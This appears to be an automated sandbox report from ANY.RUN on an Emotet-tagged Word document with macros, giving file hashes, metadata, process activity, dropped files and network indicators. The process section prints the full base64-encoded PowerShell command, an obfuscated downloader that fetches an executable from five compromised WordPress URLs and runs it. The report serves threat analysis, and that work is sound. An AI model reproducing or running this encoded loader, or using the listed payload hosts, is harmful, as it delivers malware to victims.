analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

2561 10_14_2019278976.doc

Full analysis: https://app.any.run/tasks/c26e64bd-613a-4c4e-b28f-49153d484200
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: October 14, 2019, 17:35:05
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
emotet-doc
emotet
generated-doc
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: calculate, Subject: back-end, Author: Marianna Kutch, Keywords: interactive, Comments: Croatian Kuna, Template: Normal.dotm, Last Saved By: Euna Ondricka, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Oct 14 15:00:00 2019, Last Saved Time/Date: Mon Oct 14 15:00:00 2019, Number of Pages: 1, Number of Words: 30, Number of Characters: 172, Security: 0
MD5:

C607F2F26FDAED55C0336FDDE47E6C4B

SHA1:

00EFC7E5CB484EE7E4E30A399CE2B10139DB4252

SHA256:

E05140800D32B3A3BB25E4CB9965233EEDBC26F3F7B245388E0BA3FF000A684E

SSDEEP:

3072:mPHuhowKgdzSrGsKyIwLx3NoRaWOcIBOaOhi1o5lE8COrg12bKDmwf9EJZ:mPHuhowKUzSHnLx3NoAWOJQaOhi1wKP

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Executed via WMI

      • powershell.exe (PID: 2564)
    • Creates files in the user directory

      • powershell.exe (PID: 2564)
    • PowerShell script executed

      • powershell.exe (PID: 2564)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 964)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 964)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: calculate
Subject: back-end
Author: Marianna Kutch
Keywords: interactive
Comments: Croatian Kuna
Template: Normal.dotm
LastModifiedBy: Euna Ondricka
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:10:14 14:00:00
ModifyDate: 2019:10:14 14:00:00
Pages: 1
Words: 30
Characters: 172
Security: None
CodePage: Windows Latin 1 (Western European)
Company: Willms, Veum and Huel
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 201
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
Manager: Grady
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
2
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
964"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\2561 10_14_2019278976.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2564powershell -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABhADAAeABhAGUAZgA3ADYANQA1ADEAMwAxADAAZQA0ADMAPQAnAGEAMAB4AGMAYQAxAGMAYQBkAGYAOQA2ADgAMAAyADIAJwA7ACQAYQAwAHgAMQBkADMAOABhAGMAMgA4AGQAZgBjAGMANAA2ACAAPQAgACcANAA3ADIAJwA7ACQAYQAwAHgAZABjADQAYwAxADIAYQA3AGUAMwA5ADgAPQAnAGEAMAB4AGUAYQA4ADUAOABhADYAMAA3ADMAZABlADUAMQBkACcAOwAkAGEAMAB4ADEAMQAzADcAYwBlADYAYgBkAGYAMAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAYQAwAHgAMQBkADMAOABhAGMAMgA4AGQAZgBjAGMANAA2ACsAJwAuAGUAeABlACcAOwAkAGEAMAB4AGYAZQA0ADMAMgAwADcANAA5ADIAMwAzADkAMQA9ACcAYQAwAHgAMgA4AGQANwBjADkAYQA2AGQANAAwAGYAJwA7ACQAYQAwAHgAMAAyAGMAYgA1AGQAMgBiADEAOABjADYAPQAuACgAJwBuACcAKwAnAGUAdwAtAG8AYgBqACcAKwAnAGUAYwB0ACcAKQAgAE4AZQB0AC4AdwBlAEIAQwBsAGkAZQBuAHQAOwAkAGEAMAB4ADEANQA4ADcAOQAzADQAMAAxAGIAZAAyADQAOAA9ACcAaAB0AHQAcAA6AC8ALwBhAG4AZAByAGUAdwBzAGkAYwBlAGwAbwBmAGYALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGMAagAyAGQAMAAwADAAOQAvACoAaAB0AHQAcAA6AC8ALwBiAGUAYQBuAHMAbQBlAGQAaQBhAC4AYwBvAG0ALwB6AGUAdQBzADEANgAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAHQAdQBiAGEAdwA1AHkAMwA1AC8AKgBoAHQAdABwADoALwAvAGEAYgBoAGkAZABoAGEAbQBtAGEAcwBvAGMAaQBlAHQAeQAuAGMAbwBtAC8AdwBwAC0AcwBuAGEAcABzAGgAbwB0AHMALwBpAGgAMwB2AHoAZABjADkALwAqAGgAdAB0AHAAOgAvAC8AcABjAGYAMAA4AC4AYwBvAG0ALwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AMAAyADQANAA3AC8AKgBoAHQAdABwADoALwAvAGEAYwBxAHUAaQByAGkAbgBnAC0AdABhAGwAZQBuAHQALgBjAG8AbQAvAGQAcABhAGoALwAwADUAZwBkADUANwA1AC8AJwAuACIAcwBwAGAATABpAFQAIgAoACcAKgAnACkAOwAkAGEAMAB4ADgAOQA5ADAAYQA5AGQANABiAGEAMQAwAGUANwA9ACcAYQAwAHgAZQAxADgAMAAzADgAZgBjADYANQAzAGQANQAnADsAZgBvAHIAZQBhAGMAaAAoACQAYQAwAHgAMABmADcAYgA2AGQAZQA3ADUANQAgAGkAbgAgACQAYQAwAHgAMQA1ADgANwA5ADMANAAwADEAYgBkADIANAA4ACkAewB0AHIAeQB7ACQAYQAwAHgAMAAyAGMAYgA1AGQAMgBiADEAOABjADYALgAiAGQATwB3AE4AbABgAG8AQQBgAGQAYABGAGkAbABlACIAKAAkAGEAMAB4ADAAZgA3AGIANgBkAGUANwA1ADUALAAgACQAYQAwAHgAMQAxADMANwBjAGUANgBiAGQAZgAwACkAOwAkAGEAMAB4ADgAMQBkADkAOQBhADgANwBiADEAZAA9ACcAYQAwAHgANgBiAGIAMwAyADAANQBlADcAMwA4ACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQBJACcAKwAnAHQAZQBtACcAKQAgACQAYQAwAHgAMQAxADMANwBjAGUANgBiAGQAZgAwACkALgAiAEwARQBOAGAARwBUAEgAIgAgAC0AZwBlACAAMgAxADMANwAxACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAdABhAGAAUgBUACIAKAAkAGEAMAB4ADEAMQAzADcAYwBlADYAYgBkAGYAMAApADsAJABhADAAeABjADkANAA1AGYAZQBlAGEAOQBmAD0AJwBhADAAeAA1AGEAYwBmADUAYwBiADYAYQBhACcAOwBiAHIAZQBhAGsAOwAkAGEAMAB4ADAAZQA0ADkAZgBlAGYAMwA1ADIAPQAnAGEAMAB4ADkAZABjAGEANQA5AGUAZgA0AGEANAAzADMAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAYQAwAHgAZgA5ADUANAA5ADYAYQA4ADEAYwA0ADkANAA9ACcAYQAwAHgANgBkADcAZQAyADgAZQAwAGEAMQA2ACcAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
2 166
Read events
1 343
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
2
Unknown types
17

Dropped files

PID
Process
Filename
Type
964WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA795.tmp.cvr
MD5:
SHA256:
2564powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6TFA5QV6M2YLOTGIQPWH.temp
MD5:
SHA256:
964WINWORD.EXEC:\Users\admin\Desktop\~$61 10_14_2019278976.docpgc
MD5:A94C83F471F36B14B84E5F3237F189F2
SHA256:8C50D802C7EB6C9D2968CA11FFB4D7457731FF0CD53D82B74105652C405C1A7C
964WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9FF6DBB.wmfwmf
MD5:CFB180FF4C12C87A459B2D1DEAC6A577
SHA256:558D6CBF5C940E55C9901E4DCDADF4F79E8671C08CA4C12E3E0338D3BAD5FF26
964WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\868207FF.wmfwmf
MD5:788FCF837DE9B3B079C8B217F2103747
SHA256:3C378200E1F7284F2C37E977A801976859C90BA209D0127AF907B5EDE3CED642
2564powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39b7d1.TMPbinary
MD5:35375F3D71AE42AA9777154D256B33BF
SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF
964WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5CAEB137.wmfwmf
MD5:7782D41F34F674456419B82E767B5DB9
SHA256:6845F745502BAB7956674EE5ACF5CF117E1D570ED8B92D81EA19F2DB9EF7AAE2
964WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:E9EA54BB0D13A45749F536CAFA073CF3
SHA256:DFCB35B5AD69425E955532B4CF71ADCFE8B0475728C5D199ABB1D64BF9A4A345
964WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\33100A81.wmfwmf
MD5:E66D09E3921F9101CC653DDA930BB93E
SHA256:EDBB9220D4B016E5867AB13759AC841BC5A057046A8EAC0A4ED23E4420898E0C
964WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FD9A0DBA.wmfwmf
MD5:86EEF0433A55C11D6C30530DFFF8BE74
SHA256:F7EAFE6917C8DF9F5C05C2D7B9DA8A91C4F0764DE9E55B108CE76F380C417B4E
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
5
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
404
199.204.248.102:80
http://andrewsiceloff.com/wp-admin/cj2d0009/
US
xml
345 b
suspicious
GET
404
173.236.169.124:80
http://abhidhammasociety.com/wp-snapshots/ih3vzdc9/
US
xml
345 b
unknown
GET
404
166.62.28.141:80
http://acquiring-talent.com/dpaj/05gd575/
US
xml
345 b
malicious
GET
404
149.210.131.83:80
http://beansmedia.com/zeus16/wp-includes/tubaw5y35/
NL
xml
345 b
suspicious
GET
404
62.210.16.61:80
http://pcf08.com/wp-content/02447/
FR
xml
345 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
149.210.131.83:80
beansmedia.com
Transip B.V.
NL
suspicious
166.62.28.141:80
acquiring-talent.com
GoDaddy.com, LLC
US
malicious
199.204.248.102:80
andrewsiceloff.com
CONTINENTAL BROADBAND PENNSYLVANIA, INC.
US
suspicious
173.236.169.124:80
abhidhammasociety.com
New Dream Network, LLC
US
unknown
62.210.16.61:80
pcf08.com
Online S.a.s.
FR
malicious

DNS requests

Domain
IP
Reputation
andrewsiceloff.com
  • 199.204.248.102
suspicious
beansmedia.com
  • 149.210.131.83
suspicious
abhidhammasociety.com
  • 173.236.169.124
unknown
pcf08.com
  • 62.210.16.61
malicious
acquiring-talent.com
  • 166.62.28.141
malicious

Threats

No threats detected
No debug info